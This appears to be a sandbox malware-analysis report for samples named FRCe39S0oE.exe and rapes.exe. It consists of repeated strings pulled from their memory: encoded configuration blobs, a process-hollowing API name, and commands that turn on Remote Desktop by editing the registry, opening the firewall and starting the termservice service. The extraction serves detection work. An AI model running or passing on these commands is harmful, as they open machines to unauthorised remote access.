Source: FRCe39S0oE.exe, 00000000.00000002.979950125.0000000000E91000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: FRCe39S0oE.exe, 00000000.00000003.933337144.0000000004E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: FRCe39S0oE.exe, 00000000.00000003.933337144.0000000004E10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000003.978435837.0000000004960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000003.978435837.0000000004960000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000001.00000002.1018856608.0000000000171000.00000040.00000001.01000000.00000007.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000001.00000002.1018856608.0000000000171000.00000040.00000001.01000000.00000007.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.1024637445.0000000000171000.00000040.00000001.01000000.00000007.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000002.1024637445.0000000000171000.00000040.00000001.01000000.00000007.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000002.00000003.984347300.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000002.00000003.984347300.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS 